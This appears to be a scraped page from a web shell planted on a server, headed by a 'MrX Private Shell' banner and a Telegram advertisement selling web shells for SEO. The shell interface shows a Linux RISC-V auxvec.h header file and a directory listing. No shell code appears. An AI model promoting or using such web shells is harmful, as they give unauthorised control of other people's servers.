__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/* SPDX-License-Identifier: GPL-2.0-only WITH Linux-syscall-note */ /* * Copyright (C) 2012 ARM Ltd. * Copyright (C) 2015 Regents of the University of California */ #ifndef _UAPI_ASM_RISCV_AUXVEC_H #define _UAPI_ASM_RISCV_AUXVEC_H /* vDSO location */ #define AT_SYSINFO_EHDR 33 /* * The set of entries below represent more extensive information * about the caches, in the form of two entry per cache type, * one entry containing the cache size in bytes, and the other * containing the cache line size in bytes in the bottom 16 bits * and the cache associativity in the next 16 bits. * * The associativity is such that if N is the 16-bit value, the * cache is N way set associative. A value if 0xffff means fully * associative, a value of 1 means directly mapped. * * For all these fields, a value of 0 means that the information * is not known. */ #define AT_L1I_CACHESIZE 40 #define AT_L1I_CACHEGEOMETRY 41 #define AT_L1D_CACHESIZE 42 #define AT_L1D_CACHEGEOMETRY 43 #define AT_L2_CACHESIZE 44 #define AT_L2_CACHEGEOMETRY 45 #define AT_L3_CACHESIZE 46 #define AT_L3_CACHEGEOMETRY 47 /* entries in ARCH_DLINFO */ #define AT_VECTOR_SIZE_ARCH 10 #define AT_MINSIGSTKSZ 51 #endif /* _UAPI_ASM_RISCV_AUXVEC_H */
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| vendor | Folder | 0755 |
|
|
| Kbuild | File | 85 B | 0644 |
|
| auxvec.h | File | 1.2 KB | 0644 |
|
| bitsperlong.h | File | 377 B | 0644 |
|
| bpf_perf_event.h | File | 261 B | 0644 |
|
| byteorder.h | File | 327 B | 0644 |
|
| elf.h | File | 2.85 KB | 0644 |
|
| hwcap.h | File | 973 B | 0644 |
|
| hwprobe.h | File | 3.94 KB | 0644 |
|
| kvm.h | File | 11.37 KB | 0644 |
|
| perf_regs.h | File | 920 B | 0644 |
|
| ptrace.h | File | 2.66 KB | 0644 |
|
| setup.h | File | 203 B | 0644 |
|
| sigcontext.h | File | 910 B | 0644 |
|
| ucontext.h | File | 1.32 KB | 0644 |
|
| unistd.h | File | 852 B | 0644 |
|